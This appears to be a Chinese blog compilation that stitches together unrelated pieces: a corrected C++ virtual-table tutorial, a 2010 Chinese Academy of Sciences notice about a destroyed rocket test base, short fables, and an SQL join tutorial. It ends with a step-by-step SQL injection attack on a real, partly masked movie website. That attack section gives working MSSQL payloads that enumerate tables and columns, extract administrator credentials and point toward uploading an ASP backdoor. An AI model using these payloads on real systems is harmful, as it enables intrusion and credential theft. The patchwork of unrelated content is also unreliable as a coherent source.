果然，当我回头看这篇文章下面的评论的时候，才知道，作者确实某些地方说错了。。。但是，回过头来评价这篇文章，真的是一绝的好文，堪称一绝是无可厚非的。

现在我将其中的错误作出相应的修改，以及矛盾的说明，并以红色字说明。

original:

C++中的虚函数的作用主要是实现了多态的机制。关于多态，简而言之就是用父类型别的指针指向其子类的实例，然后通过父类的指针调用实际子类的成员函数。这种技术可以让父类的指针有“多种形态”，这是一种泛型技术。所谓泛型技术，说白了就是试图使用不变的代码来实现可变的算法。比如：模板技术，RTTI技术，虚函数技术，要么是试图做到在编译时决议，要么试图做到运行时决议。

关于虚函数的使用方法，我在这里不做过多的阐述。大家可以看看相关的C++的书籍。在这篇文章中，我只想从虚函数的实现机制上面为大家 一个清晰的剖析。

当然，相同的文章在网上也出现过一些了，但我总感觉这些文章不是很容易阅读，大段大段的代码，没有图片，没有详细的说明，没有比较，没有举一反三。不利于学习和阅读，所以这是我想写下这篇文章的原因。也希望大家多给我提意见。

言归正传，让我们一起进入虚函数的世界。

虚函数表

对C++ 了解的人都应该知道虚函数（Virtual Function）是通过一张虚函数表（Virtual Table）来实现的。简称为V-Table。 在这个表中，主是要一个类的虚函数的地址表，这张表解决了继承、覆盖的问题，保证其容真实反应实际的函数。这样，在有虚函数的类的实例中这个表被分配在了 这个实例的内存中（应该更正为 一个类的虚函数表是静态的，也就是说对这个类的每个实例，他的虚函数表的是固定的，不会为每个实例生成一个相应的虚函数表。），所以，当我们用父类的指针来操作一个子类的时候，这张虚函数表就显得由为重要了，它就像一个地图一样，指明了实际所应该调用的函数。

这里我们着重看一下这张虚函数表。在C++的标准规格说明书中说到，编译器必需要保证虚函数表的指针(这里明明说对象实例的最前面的位置存的是虚函数表的指针，注意，不是虚函数表，而是指向虚函数表的指针，然后再看下面的例子上的代码)存在于对象实例中最前面的位置（这是为了保证正确取到虚函数的偏移量）。 这意味着我们通过对象实例的地址得到这张虚函数表(这话没错，不过，通过对象实例的地址一次是取不到的，需要两次)，然后就可以遍历其中函数指针，并调用相应的函数。

听我扯了那么多，我可以感觉出来你现在可能比以前更加晕头转向了。 没关系，下面就是实际的例子，相信聪明的你一看就明白了。

假设我们有这样的一个类：

class Base {

public:

virtual void f() { cout << “Base::f” << endl; }

virtual void g() { cout << “Base::g” << endl; }

virtual void h() { cout << “Base::h” << endl; }

};

按照上面的说法，我们可以通过Base的实例来得到虚函数表。 下面是实际例程：

typedef void(*Fun)(void);

Base b;

Fun pFun = NULL;

cout << “虚函数表地址：” << (int*)(&b) << endl;  //这只是对象实例的地址，而非虚函数表的地址，*(int*)(&b)才是指向虚函数表的指针，也就是虚函数表的地址，这与最前面的括号里面的注明相呼应。

cout << “虚函数表 — 第一个函数地址：” << (int*)*(int*)(&b) << endl;  //而这个才是虚函数表的地址，虚函数表的第一个函数地址（函数指针）应该是*(int*)*(int*)(&b)，这样下面的函数指针赋值才说得通：pFun = (Fun)*((int*)*(int*)(&b)); ，不然下面的“

(Fun)*((int*)*(int*)(&b)+0); // Base::f()

(Fun)*((int*)*(int*)(&b)+1); // Base::g()

(Fun)*((int*)*(int*)(&b)+2); // Base::h()

”

的+0， +1， +2这样的函数指针偏移方式也说不通了。

// Invoke the first virtual function

pFun = (Fun)*((int*)*(int*)(&b));

pFun();

实际运行经果如下：(Windows XP+VS2003, Linux 2.6.22 + GCC 4.1.3)

虚函数表地址：0012FED4

虚函数表 — 第一个函数地址：0044F148

Base::f

通过这个示例，我们可以看到，我们可以通过强行把&b转成int *，取得虚函数表的地址，然后，再次取址就可以得到第一个虚函数的地址了，也就是Base::f()，这在上面的程序中得到了验证（把int* 强制转成了函数指针）。通过这个示例，我们就可以知道如果要调用Base::g()和Base::h()，其代码如下：

(Fun)*((int*)*(int*)(&b)+0); // Base::f()

(Fun)*((int*)*(int*)(&b)+1); // Base::g()

(Fun)*((int*)*(int*)(&b)+2); // Base::h()

这个时候你应该懂了吧。什么？还是有点晕。也是，这样的代码看着太乱了。没问题，让我画个图解释一下。如下所示：

注意：在上面这个图中，我在虚函数表的最后多加了一个结点，这是虚函数表的结束结点，就像字符串的结束符“\0”一样，其标志了虚函数表的结束。这个结束标志的值在不同的编译器下是不同的。在WinXP+VS2003下，这个值是NULL。而在Ubuntu 7.10 + Linux 2.6.22 + GCC 4.1.3下，这个值是如果1，表示还有下一个虚函数表，如果值是0，表示是最后一个虚函数表。

下面，我将分别说明“无覆盖”和“有覆盖”时的虚函数表的样子。没有覆盖父类的虚函数是毫无意义的。我之所以要讲述没有覆盖的情况，主要目的是为了给一个对比。在比较之下，我们可以更加清楚地知道其内部的具体实现。

一般继承（无虚函数覆盖）

下面，再让我们来看看继承时的虚函数表是什么样的。假设有如下所示的一个继承关系：

请注意，在这个继承关系中，子类没有重载任何父类的函数。那么，在派生类的实例中，其虚函数表如下所示：

对于实例：Derive d; 的虚函数表如下：

我们可以看到下面几点：

1）虚函数按照其声明顺序放于表中。

2）父类的虚函数在子类的虚函数前面。

我相信聪明的你一定可以参考前面的那个程序，来编写一段程序来验证。

一般继承（有虚函数覆盖）

覆盖父类的虚函数是很显然的事情，不然，虚函数就变得毫无意义。下面，我们来看一下，如果子类中有虚函数重载了父类的虚函数，会是一个什么样子？假设，我们有下面这样的一个继承关系。

为了让大家看到被继承过后的效果，在这个类的设计中，我只覆盖了父类的一个函数：f()。那么，对于派生类的实例，其虚函数表会是下面的一个样子：

我们从表中可以看到下面几点，

1）覆盖的f()函数被放到了虚表中原来父类虚函数的位置。

2）没有被覆盖的函数依旧。

这样，我们就可以看到对于下面这样的程序，

Base *b = new Derive();

b->f();

由b所指的内存中的虚函数表的f()的位置已经被Derive::f()函数地址所取代，于是在实际调用发生时，是Derive::f()被调用了。这就实现了多态。

多重继承（无虚函数覆盖）

下面，再让我们来看看多重继承中的情况，假设有下面这样一个类的继承关系。注意：子类并没有覆盖父类的函数。

对于子类实例中的虚函数表，是下面这个样子：

我们可以看到：

1） 每个父类都有自己的虚表。

2） 子类的成员函数被放到了第一个父类的表中。（所谓的第一个父类是按照声明顺序来判断的）

这样做就是为了解决不同的父类类型的指针指向同一个子类实例，而能够调用到实际的函数。

多重继承（有虚函数覆盖）

下面我们再来看看，如果发生虚函数覆盖的情况。

下图中，我们在子类中覆盖了父类的f()函数。

下面是对于子类实例中的虚函数表的图：

我们可以看见，三个父类虚函数表中的f()的位置被替换成了子类的函数指针。这样，我们就可以任一静态类型的父类来指向子类，并调用子类的f()了。如：

Derive d;

Base1 *b1 = &d;

Base2 *b2 = &d;

Base3 *b3 = &d;

b1->f(); //Derive::f()

b2->f(); //Derive::f()

b3->f(); //Derive::f()

b1->g(); //Base1::g()

b2->g(); //Base2::g()

b3->g(); //Base3::g()

安全性

每次写C++的文章，总免不了要批判一下C++。这篇文章也不例外。通过上面的讲述，相信我们对虚函数表有一个比较细致的了解了。水可载舟，亦可覆舟。下面，让我们来看看我们可以用虚函数表来干点什么坏事吧。

一、通过父类型的指针访问子类自己的虚函数

我们知道，子类没有重载父类的虚函数是一件毫无意义的事情。因为多态也是要基于函数重载的。虽然在上面的图中我们可以看到Base1的虚表中有Derive的虚函数，但我们根本不可能使用下面的语句来调用子类的自有虚函数：

Base1 *b1 = new Derive();

b1->f1(); //编译出错

任何妄图使用父类指针想调用子类中的未覆盖父类的成员函数的行为都会被编译器视为非法，所以，这样的程序根本无法编译通过。但在运行时，我们可以通过指针的方式访问虚函数表来达到违反C++语义的行为。（关于这方面的尝试，通过阅读后面附录的代码，相信你可以做到这一点）

二、访问non-public的虚函数

另外，如果父类的虚函数是private或是protected的，但这些非public的虚函数同样会存在于虚函数表中，所以，我们同样可以使用访问虚函数表的方式来访问这些non-public的虚函数，这是很容易做到的。

如：

class Base {

private:

virtual void f() { cout << “Base::f” << endl; }

};

class Derive : public Base{

};

typedef void(*Fun)(void);

void main() {

Derive d;

Fun pFun = (Fun)*((int*)*(int*)(&d)+0);

pFun();

}

结束语

C++这门语言是一门Magic的语言，对于程序员来说，我们似乎永远摸不清楚这门语言背着我们在干了什么。需要熟悉这门语言，我们就必需要了解C++里面的那些东西，需要去了解C++中那些危险的东西。不然，这是一种搬起石头砸自己脚的编程语言。

为了说明文章里提到的问题，我在下面附上我的代码，环境是g++ 编译的，编译时要注意多一个参数，

g++ virtual_func.cpp -Wno-pmf-conversions -o virtual_func

代码：

#include<iostream>
#include<stdio.h>
using namespace std;
typedef void(*Fun)(void);
typedef void (*func_type)(void * obj);
class Base {

public:
    virtual void f() { cout << "Base::f" << endl; }

    virtual void g() { cout << "Base::g" << endl; }

    virtual void h() { cout << "Base::h" << endl; }
}; 

int main(int argc, char* argv[])
{
    Base a,b;
    func_type pa,pb;
    pa = &Base::f;
    pb = &Base::f;
    cout << "Addr of b: " << (int*)(&b) << endl;
    cout << "Addr of v-table in b: " << (int*)*(int*)(&b) << endl; //虚函数表的地址。
    cout << "Addr of first virtual func in v-table of b: " << (int*)*(int*)*(int*)(&b) << endl; //第一个虚函数的地址
    cout << "Addr of a: " << (int*)(&a) << endl;
    cout << "Addr of v-table in a: " << (int*)*(int*)(&a) << endl;
    cout << "Addr of first virtual func in v-table of a: " << (int*)*(int*)*(int*)(&a) << endl; //从这里我们可以看到，无论是实例a，还是实例b，他们的虚函数地址是一样的，也就是上面红色字体说的，虚函数表是静态的，不会为每个实例生成一个相应的虚函数表。
   Fun pFun = NULL;
   Fun pFuni = NULL;
   // Invoke the first virtual function
   pFun = (Fun)*((int*)*(int*)(&b));
   cout << "pFun callback: " ;
   pFun();
   cout << endl;
   cout << "Callback of b: " ;
   pa(&b);
   cout << endl;
   cout << "Callback of a: " ;
   pb(&a);
   cout << endl;
   //printf("(int*)*(int*)(&b): 0x%x\n",*(int*)*(int*)(&b));
   printf("pFun: 0x%x\n", pFun); //这行以及下一行其实没多大意义，只是为了证明所有实例的虚函数表地址和虚函数 地址是一样的。
   printf("pb: 0x%x\n", pb);
   printf("pa: 0x%x\n", pa);
   return 0;
 }

运行结果如下：

Addr of b: 0xbfffe088
Addr of v-table in b: 0x8048c98
Addr of first virtual func in v-table of b: 0x8048a8a
Addr of a: 0xbfffe08c
Addr of v-table in a: 0x8048c98
Addr of first virtual func in v-table of a: 0x8048a8a
pFun callback: Base::f

Callback of b: Base::f

Callback of a: Base::f

pFun: 0x8048a8a
pb: 0x8048a8a
pa: 0x8048a8a

2010年7月17日上午，试验基地的保安人员被一伙不明身份人员控制，失去人身自由。在此期间，共计9处房屋被大型铲车与推土机夷为平地，一批重要的科研装置和设备被砸毁掩埋。2010年7月22日至23日，该试验基地再遭持续地肆意毁坏，钱学森先生回国初期指导研制的科研装备等大量历史性文物、国家973项目试验装备、国防重大科研任务的仪器装置和备件等以“垃圾”的名义被清除出场，值守该试验基地的工作人员深受刺激入院治疗。

该试验基地是钱学森先生回国后亲自选址和创建的，是我国第一个火箭研究与试验基地，为我国“两弹一星”做出了重大的历史性贡献。目前，该试验基地正承担着国家重大专项、国家重大基础研究发展计划项目等重大科研任务。此次试验基地被毁，初步统计的国有资产直接损失高达1700余万元。更加令人痛心的是，一批我国现代科技史上代表性的珍贵文物被肆无忌惮的捣毁和清运，一批国家级的重大科研任务被迫停滞。

在我国和谐、稳定、快速发展的大好局面下，在中国科学院这一神圣的科学殿堂，发生了如此野蛮的暴力事件，令人震惊！力学所参与试验基地建设和“两弹一星”攻关任务的院士和科学家们悲愤交加，全体科研人员极为愤慨。“炎夏似隆冬，白昼如夤夜”是我们此刻共同的感受。

事件发生后，我们已经在第一时间向中科院有关领导和部门进行了汇报，并向当地公安机关报案。我们要相信党、相信组织，让我们一起期待法律的公正判决！

请全体职工和学生克制情绪，保重身体，克服困难，团结起来，勤奋工作，以实实在在的科研工作报效祖国，告慰钱学森先生等的在天之灵！

中国科学院力学研究所

2010年7月23日

详见：http://www.imech.ac.cn/xwdt/tpxw/201007/t20100723_2909933.html

橡树和芦苇

一棵大橡树被大风连根拔起，飞到河那边，落到一片芦苇旁。橡树对芦苇说：”你们那么轻弱，我真不明白你们怎么会不被狂风彻底摧残呢？”芦苇回答说：”你和风抗争，最后你失败了。而我们正好相反，只要有一点点微风，我们就在它面前弯下腰来，因此就不会被折断，所以能避免摧残。”

芦苇正得意洋洋地说教着，一个农人走过来，发现了这棵橡树，如获至宝。农人家里准备打家具，这根橡木正合适。农人临走时还割倒了一片芦苇，农人家里也正缺少柴禾。过了几天，芦苇被送进灶膛时，忍不住又看了一下那棵橡树–橡树已被打造成一只柜子，这回芦苇不再多舌。

核桃树

路旁的核桃树结满了核桃。过路的行人为了把核桃打下来，用石头打它，用棍子敲它，把它的树枝都弄折了。核桃树不由地叹息道：”唉，我的命真苦啊！我用我的核桃给人们享用，而他们却给我这种痛苦做回报！”它的叹息给旁边的另一棵不结核桃的核桃树听到了，不结核桃的核桃树同情地说：”看来，你得学我的样，不结一颗核桃出来，那么，人们又怎能摧残你呢！”结核桃的核桃树想了想说：”到底我也有我的荣耀啊！人们走过我的身边，常常会对我发出赞叹，赞叹我的丰美，赞叹我的能耐。一旦不结果子了，我还能得到这些荣耀吗？再说，做一棵不结核桃的核桃树，还能算是核桃树么？”不结核桃的核桃树听了此话生气地说：”我好心好意地劝你，你倒要嘲笑我，你既要享受荣誉，那就只好受苦了！”

唱歌的人

有个人没有唱歌的天分，但很喜欢唱歌。平常他在家里对着墙壁，大唱特唱，声音在屋里回响。他觉得自己的嗓音实在好极了，周围的一切都在欣赏他、赞美他无与伦比的歌喉。钟摆不由自主和着他的拍子，蚊子情不自禁为他伴唱，连他自己的影子都在一晃一晃为他起舞。他决定走出屋外，登台演出。可是离腔走调的破嗓音实在难听，观众忍无可忍发出一片嘘声，最后一个个都逃走了。他在空旷的台上，发出怨言：都说知音难觅，这话真是没错，这些人哪，竟不及我屋子里一只蚊子懂得欣赏！

作者：徐慧芬

SQL-92标准所定义的FROM子句的连接语法格式为：

FROM join_table join_type join_table

[ON (join_condition)]

其中join_table指出参与连接操作的表名，连接可以对同一个表操作，也可以对多表操作，对同一个表操作的连接又称做自连接。

join_type 指出连接类型，可分为三种：内连接、外连接和交叉连接。内连接(INNER JOIN)使用比较运算符进行表间某(些)列数据的比较操作，并列出这些表中与连接条件相匹配的数据行。根据所使用的比较方式不同，内连接又分为等值连接、自然连接和不等连接三种。

外连接分为左外连接(LEFT OUTER JOIN或LEFT JOIN)、右外连接(RIGHT OUTER JOIN或RIGHT JOIN)和全外连接(FULL OUTER JOIN或FULL JOIN)三种。与内连接不同的是，外连接不只列出与连接条件相匹配的行，而是列出左表(左外连接时)、右表(右外连接时)或两个表(全外连接时)中所有符合搜索条件的数据行。

交叉连接(CROSS JOIN)没有WHERE 子句，它返回连接表中所有数据行的笛卡尔积，其结果集合中的数据行数等于第一个表中符合查询条件的数据行数乘以第二个表中符合查询条件的数据行数。

连接操作中的ON (join_condition) 子句指出连接条件，它由被连接表中的列和比较运算符、逻辑运算符等构成。

无论哪种连接都不能对text、ntext和image数据类型列进行直接连接，但可以对这三种列进行间接连接。例如：

SELECT p1.pub_id,p2.pub_id,p1.pr_info

FROM pub_info AS p1 INNER JOIN pub_info AS p2

ON DATALENGTH(p1.pr_info)=DATALENGTH(p2.pr_info)

(一)内连接

内连接查询操作列出与连接条件匹配的数据行，它使用比较运算符比较被连接列的列值。内连接分三种：

1、等值连接：在连接条件中使用等于号(=)运算符比较被连接列的列值，其查询结果中列出被连接表中的所有列，包括其中的重复列。

2、不等连接： 在连接条件使用除等于运算符以外的其它比较运算符比较被连接的列的列值。这些运算符包括>、>=、<=、<、!>、!<和<>。

3、自然连接：在连接条件中使用等于(=)运算符比较被连接列的列值，但它使用选择列表指出查询结果集合中所包括的列，并删除连接表中的重复列。

例，下面使用等值连接列出authors和publishers表中位于同一城市的作者和出版社：

SELECT *

FROM authors AS a INNER JOIN publishers AS p

ON a.city=p.city

又如使用自然连接，在选择列表中删除authors 和publishers 表中重复列(city和state)：

SELECT a.*,p.pub_id,p.pub_name,p.country

FROM authors AS a INNER JOIN publishers AS p

ON a.city=p.city

(二)外连接

内连接时，返回查询结果集合中的仅是符合查询条件( WHERE 搜索条件或 HAVING 条件)和连接条件的行。而采用外连接时，它返回到查询结果集合中的不仅包含符合连接条件的行，而且还包括左表(左外连接时)、右表(右外连接时)或两个边接表(全外连接)中的所有数据行。

如下面使用左外连接将论坛内容和作者信息连接起来：

SELECT a.*,b.* FROM luntan LEFT JOIN usertable as b

ON a.username=b.username

下面使用全外连接将city表中的所有作者以及user表中的所有作者，以及他们所在的城市：

SELECT a.*,b.*

FROM city as a FULL OUTER JOIN user as b

ON a.username=b.username

(三)交叉连接

交叉连接不带WHERE 子句，它返回被连接的两个表所有数据行的笛卡尔积，返回到结果集合中的数据行数等于第一个表中符合查询条件的数据行数乘以第二个表中符合查询条件的数据行数。

例，titles表中有6类图书，而publishers表中有8家出版社，则下列交叉连接检索到的记录数将等

于6*8=48行。

SELECT type,pub_name

FROM titles CROSS JOIN publishers

ORDER BY type

via http://www.knowsky.com/869.html

表名和字段名的获得

_适用情况:

1)数据库是MSSQL

2)连接数据库的只是普通用户

3)不知道ASP源代码

可以进行的攻击

1)对数据内容进行添加，查看，更改

实例:

本文件以

http://www.dy***.com/user/wantpws.asp

为列进行测试攻击。

第一步:

在输入用户名处输入单引号，显示

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'

字符串 ''' 之前有未闭合的引号。

/user/wantpws.asp，行63

说明没有过滤单引号且数据库是MSSQL.

第二步:

输入a';use master;--

显示

Microsoft OLE DB Provider for SQL Server 错误 '80040e21'

多步 OLE DB 操作产生错误。如果可能，请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp，行63

这样说明没有权限了。

第三步:

输入:a' or name like 'fff%';--

显示有一个叫ffff的用户哈。

第四步:

在用户名处输入

ffff' and 1<>(select count(email) from [user]);--

显示:

Microsoft OLE DB Provider for SQL Server 错误 '80040e37'

对象名 'user' 无效。

/user/wantpws.asp，行96

说明没有叫user的表，换成users试试成功,同时说明有一个叫email的列.

(东方飘云的一个办法是输入a' having 1=1--

一般返回如下也就可以直接得到表名和一个字段名了

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'

列 'users.ID' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。

/user/wantpws.asp，行63

)

现在我们知道了ffff用户的密码是111111.

下面通过语句得到数据库中的所有表名和字段名。

第五步:

输入:

ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and status>0) where name=’ffff’;–

说明:

上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID

ffff’;update [users] set email=(select top 1 id from sysobjects where xtype=’u’ and name=’ad’) where name=’ffff’;–

同上可知id是:581577110

由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了

象下面这样就可以得到第二个表的名字了

ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and id>581577110) where name=’ffff’;–

ad 581577110

users 597577167

buy 613577224

car 629577281

learning 645577338

log 661577395

movie 677577452

movieurl 693577509

password 709577566

type 725577623

talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段

输入:

现在就看看users表有哪些字段

ffff’;update [users] set email=(select top 1 col_name(object_id(‘users’),3) from users) where name=’ffff’;–

得到第三个字段是password

ffff’;update [users] set email=(select top 1 col_name(object_id(‘users’),4) from users) where name=’ffff’;–

得到第四个字段是name

最后users表的字段共28个全得到了

(注:另一个得到字段的办法,前提是系统的返回出错信息

a’ group by ID having 1=1–

得到

Microsoft OLE DB Provider for SQL Server 错误 ‘80040e14′

列 ‘users.userid’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/user/wantpws.asp，行63

这个第二个字段就是userid

显示第三个字段。

a’ group by id,userid having 1=1–

Microsoft OLE DB Provider for SQL Server 错误 ‘80040e14′

列 ‘users.password’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/user/wantpws.asp，行63

得到是password

同理，一直显示出所有。：）

)

users表

1 2 3 4

id userid password name

5 6 7 8 9 10 11 12 13 14 15 16

Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28

oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note

starlook–12 10 2003 2:41PM

nlook—0

nos—2 登陆次数

date–12 10 2003 12:00AM 注册时间?

money–同上

send–空

oklook–0

dnlook–0

getmoney–0

state–0

note–这家伙很。。。 说明

password表

1 2 3

id name pwd

然后我又试ad原来是用来记录广告击点的。。

然后又试password表得到有name和pwd字段。

执行

ffff’;update [users] set email=(select top 1 name from password) where name=’ffff’;–

可得第一个用户名是admin123看样儿多半是管理员了。

然后又得到了密码是dy***dick188还是打星号算了哈哈…

这样我们就完全进入了这个电影网站的后台了哈哈。

http://www.dy/***.com/login.asp

再进一步还可以知道管理员一共有三人密码也都能看到了。

ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;–

ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;–

ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;–

只是能免费看电影好象还不够哈..我看了看它的后台管理原来在

添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就

能上传一个asp后门并执行.